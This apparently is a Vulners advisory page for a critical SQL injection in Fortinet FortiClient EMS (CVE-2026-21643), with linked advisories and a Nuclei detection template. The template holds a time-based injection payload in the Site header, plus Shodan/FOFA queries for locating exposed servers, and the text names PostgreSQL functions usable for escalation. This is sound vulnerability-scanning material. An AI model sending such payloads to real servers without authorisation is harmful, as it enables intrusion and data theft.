| Reporter | Title | Published | Views | Family All 22 |
|---|---|---|---|---|
| CVE-2026-21643 | 6 Feb 202608:24 | – | attackerkb | |
| The vulnerability in the web interface of the Fortinet FortiClient Enterprise Management Server (EMS) allows a perpetrator to execute arbitrary commands. | 9 Feb 202600:00 | – | bdu_fstec | |
| CVE-2026-21643 | 6 Feb 202610:00 | – | circl | |
| Fortinet FortiClient EMS SQL Injection Vulnerability | 13 Apr 202600:00 | – | cisa_kev | |
| CISA Adds Seven Known Exploited Vulnerabilities to Catalog | 13 Apr 202612:00 | – | cisa | |
| Fortinet FortiClientEMS SQL注入漏洞 | 6 Feb 202600:00 | – | cnnvd | |
| CVE-2026-21643 | 6 Feb 202608:24 | – | cve | |
| CVE-2026-21643 | 6 Feb 202608:24 | – | cvelist | |
| EUVD-2026-5681 | 6 Feb 202608:24 | – | euvd | |
| Fortinet FortiClient EMS 7.4.4 SQLi (FG-IR-25-1142) | 1 Apr 202600:00 | – | nessus |
| Source | Link |
|---|---|
| fortiguard | www.fortiguard.com/psirt/FG-IR-2026-21643 |
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2026-21643 |
id: CVE-2026-21643
info:
name: Fortinet FortiClientEMS 7.4.4 - SQL Injection
author: ritikchaddha
severity: critical
description: |
Fortinet FortiClientEMS version 7.4.4 and earlier contains an unauthenticated SQL injection vulnerability in the /api/v1/init_consts endpoint. The 'Site' HTTP header value is passed directly into the PostgreSQL search_path without sanitization, allowing remote unauthenticated attackers to inject arbitrary SQL commands. This can lead to information disclosure, database manipulation, or OS command execution when chained with PostgreSQL functions.
impact: |
An unauthenticated remote attacker can execute arbitrary SQL queries against the backend PostgreSQL database, potentially extracting sensitive data, modifying database contents, or achieving remote code execution through PostgreSQL-specific functions (e.g., COPY, lo_import, pg_read_file).
remediation: |
Upgrade FortiClientEMS to a patched version as recommended by Fortinet. As a workaround, restrict network access to the FortiClientEMS management interface and apply WAF rules to filter malicious Site header values.
reference:
- https://www.fortiguard.com/psirt/FG-IR-2026-21643
- https://nvd.nist.gov/vuln/detail/CVE-2026-21643
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-21643
cwe-id: CWE-89
epss-score: 0.94085
epss-percentile: 0.99836
metadata:
verified: false
max-request: 2
vendor: fortinet
product: forticlientems
shodan-query: http.favicon.hash:-800551065
fofa-query: icon_hash="-800551065"
tags: cve,cve2026,sqli,forticlient,ems,fortinet,,vkev,kev
http:
- raw:
- |
GET /api/v1/init_consts HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 20s
GET /api/v1/init_consts HTTP/1.1
Host: {{Hostname}}
Site: tenant1; SELECT pg_sleep(8)--
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(body_1, "SITES_ENABLED\": true")'
- type: dsl
name: time-based
dsl:
- "duration_2>=8"
- "status_code_2 == 500"
condition: and
# digest: 4a0a00473045022002f72dc723fdeffaf24921d5b4a92545ba62945ba205d9696b18f9c0a1cc1c2c0221009eb3a644dfa2d8062e0bfe333f300727ab48739f277e7a2a991902d6762e2ab5:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation